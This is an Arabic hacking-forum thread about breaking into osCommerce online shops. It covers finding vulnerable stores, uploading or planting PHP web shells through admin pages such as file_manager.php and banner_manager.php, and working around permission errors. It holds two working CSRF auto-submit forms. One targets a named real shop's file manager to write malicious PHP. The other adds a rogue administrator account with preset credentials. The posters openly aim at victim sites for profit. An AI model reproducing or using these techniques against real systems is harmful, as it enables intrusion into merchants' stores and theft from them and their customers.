osCommerce دراسه لسكربت ومشاكل رفع الشيل

السلام عليكم ورحمه الله وبركاته

osCommerce دراسه لسكربت ومشاكل رفع الشيل

وانا اشوف بالسكربت الي عملو اخونا وسيم الله يخليه عجبني كثير خاصه بعد ما اضاف له خاصيه الفولدر الي نبحث عنه
الله يخليه :rolleyes:

فقلت بما انه الشباب كثير صارت تهتم لهاد السكربت خاصه انهم ببحثو عن $$$$$

خليني اشتغل عليه بلكن طورنا شغله ولا نزلنا شغله

مسكت جوجل جيت ابحث عن مواقع مصابه

eek

لقيت مليان مواقع ما تعرف هي للسكربت ولا لتحميله ولا ثغره بالسكربت
<<<<<< ماشاء الله مواقع السكيورتي منتشره وارشيفها قوي لدرجه انه ضاعت سكربتاتنا بجوجل هههههه

المهم

وانا ابحث بالمواقع واجهت مشكله
1- الجدار الناري
2- رفع الشيل ع الموقع

الجدار الناري مالنا منه خلاص

طيب ورفع الشيل لقيت مشاكل التاليه

1- كثير تحاول ترفع شيل ما يرضى يرفع <<<< جايب لكم حل
2- رفعت شلات ع اكثر من موقع وما يشتغل الشيل لسببين انتيرنال ايروور او الشيل يتصرح 777 بالتالي يسقط

لا تقولي خمن سي بنل وافتي بي لانه هاد الشغل مرفوض بشكل جزئي << بنفرض انه التخمين دائما غلط

(وهاي حقيقه اخواني ياريت دائما تضعو التخمين دائما ناتجه غلط حتى نوصل لابداع جديد )

طيب الان ايش الي جبته انا بالموضوع :expressionless:

والله لسا كنت بكتب لوسيم يحمل لي باك اب ملفات احد المواقع عشان افحص بشكل افضل
لانه النسخه الي بالتحميل مش مثل النسخه الي بالسوق :slight_smile: بس الي بدي اياه وصلت له :stuck_out_tongue:

حملت السكربت من هون

http://www.oscommerce.com/solutions/downloads

ونصبته هون

http://www.devilishlysaintful.co.za/oscommerce-2.2rc2a/catalog/

ع اساس اسهل نلقى حلول

طيب بالنسبه لطريقت رفع الشل

اتوقع الاغلب بروح tools
file_manager.php
وبنزل للاسفل

ويضغط ابلود

يجي هون

يابلد الي بده اياه

حتقولي ياعبدو ايش الجديد الي جبتو

انا اصلا بقولكم هاي مشكله الي متعامل مع هاد السكربت بكثره
راح يلاحظ انه ما يقدر باغلب السكربتات يرفع شيل والسبب
اما اخطاء طرمه او مشاكل بنفس السكربت << بكون صاحب الموقع فلس من كثر الاطفال الي دعسوه
وبده يحاول يرقع الثغره …

طب والحل

اول حل هو الرفع من هاد المسار

admin/banner_manager.php

بترفع بانر اعلان لا تروح تعمل تعديل لاعلان

اعمل اعلان جديد ويرفع معاك باذن الله

حتقولي وبلكن ما رفع

فعلا انا جربت سكربتات
وكان ببعضها ما يرفع احترت بالموضوع ايه اعمل لعيون الشباب

نبشت شويه بين السكربتات لقيت هاد المسار تحفه

admin/categories.php?cPath=&cID=354&action=edit_category&osCAdminID=7921240841f01a8471d3852ef8801913

ههههه لا حد يسالني كيف جبته بعرف انه جريده خخخخخخ

شوفو الروعه

يرفع بمسار خارج فايل admin وهاد كثير كويس
وبنجح الرفع بنسبه عاليه


بتقول بنجح الرفع يعني ممكن ما يرفع :expressionless:

مبكذب عليكم حتى لقيت مبرمجين مسكرين الطريق من هاي

برضو بدنا حل نهائي يا عبدو


بخليه للاخير لانه الحل النهائي سخيف هههههههه

نكمل بالنقطه الثانيه من المشاكل ------ وبعد ارجع للاولى <<<<<< ناوي يخربتطم متعمد

أول شيء الحلو بالسكربت برفع وهي رفعنا ملف up2.php عباره عن شل صغير الحجم كثيرا

لاحظو عند الاستعراض راح يطلع لنا انتيرنال ايروور

اكيد واحد حيقولك هاد المشكله بالهتاكتتس :confused:

انا بقول غير هالكلام
رحت نبشت كل الهتاكتتسات بالمنطقه ملقتش فيها شي مميز
طييب ومسحنا الهتاكتتس وبرضو المشكله بعد ما راحت

لاحظت انا شيء مميز بالي برفعه عن غيره :expressionless:

زي ما انتو شايفين 777

مدري ليش ما يشتغل الفايل بسببها بس بتضل مشكله وبدها علاج

طيب والحل
الحل لهاي المشكله وحل لمشكلت الابلود

نعدل تصريح الملفات ما لقيته كويس

بس افضل حل لقيته وهو بديل الابلود تعديل الملفات

/admin/file_manager.php?info=volcano.php&action=edit

غير كلمت volcano.php لاي ملف مصرح تصريح محترم راح يطلع معاك زي هيك

وبعد ما تضغط حفظ راح ينحفظ الشيل
ملاحظه افضل تضع كود ثغره وليس شيل لانه ما يقبل ملفات كبيره الحجم

والنتيجه الحلوه

بالمناسبه حاولت اعمل له ثغره csrf أو ثغره xsrf كلاهم بهيك سكربت رح يوصل لنفس النتيجه

بس للاسف ما **طت معي بترك لكم الكود الي عملته والي حابب يطور عليه مش غلط



<form name="csrf" method="POST"  action="http://www.servgrafweb.com.br/loja/admin/file_manager.php" >
<input type="hidden" name="filename" value="ssl_check.php" />
<body onload="document.csrf.submit();">
<input type="hidden" name="file_contents" value="evilphpcode-by-Kala$nikoV-t34m" />
</form>


الي يقدر يعدل ع الثغره يعدل ومسار الشغل للثغره

file_manager.php?info=ssl_check.php&action=edit

اتوقع مشكلتي بالانبوت ناقص فورم

اتمنا يعجبكم الموضوع !!

نسيت اضع لكم هالرابط

http://www.oscommerceexploit.com/
هاد فيه كل ثغرات الي نازله بمواقع السكيورتي للسكربت فوق

مشكور جدا

والتعديل على الملفات هو الحل الامثل لتخطى موضوع الفوربيدن

انا بعدل دائما على سكربت بيكون مصرح

وانتهينا

تسـلم عبود تفكير حـلو

وع فكرة ما يحتاج موضوع الرفع ابدا فكر شوي ورح تسوي كود يغير لك باسوورد الادمن او يضيف واحد جديد

المشكلة مشـ هنـا

المشكلة انه كل ملف ترفعه من هالسكريبت بغض النظر من وين الرفع اذا من ال banner او من ملفات السكريبت نفسها

الادمن بيكون مغير تصـريح ملف images وهنا المشكلة الاكبر وانا ما لاقيت حـل لهـا :slight_smile:

تحيـاتي

تطوير جميل شكراا

اسكربت تغيير الادمن


&lt;form method="post" action="http://site.com/admin/administrators.php/login.php?action=insert"&gt;
&lt;input type=hidden name="username" value="test" /&gt;
&lt;input type=hidden name="password" value="123456" /&gt;
&lt;input type=hidden name="x" value="16" /&gt;
&lt;input type=hidden name="y" value="13" /&gt;
&lt;/form&gt;
&lt;script&gt;document.getElementsByTagName("form")[0].submit();&lt;/script&gt;

احفظ وغير مسار الموقع الى الموقع المصاب

وافتح اللنك

وقم بالدخول بيوزر test

والباس 123456

بالتوفيق

هذا اضافة ادمن وليس تغييره

انظر الى ?action=insert

لو كانت edit فهي التعديل لكن باختلاف المسـار

ممممم

بتوقع لو قدرنا نرفع مكان خارج المجلد المصرح نحل المشكله الي معك يا بلاك

ياريت ترسلي رابط ع … (الخاص او غيره ) … اجرب فيه لانه بصراحه بدها تجارب مش تجربه :blush:

ما تقدر ترفع خارج هالملف

تمت برمجة السكريبت ع انه ملف images هو الملف المخصص لحفظ الملفات المرفوعة

الا اذا عدلنا ع ملفات السكريبت وحطينا غير هالملف بس بدها ساعات طويلة

ddd

,<<<<<<<<<< الظاهر انه مش فاهم قصدك

ع كل بنتقاتل ع الايميل وبفهم منك كويس

وزي ما قالت ستي ,<< بايخه

فش حمايه الا الها حل

موفقين إنشاء الله :slight_smile:

الله يابكر فيك خويا موضوع جميل ومتكامل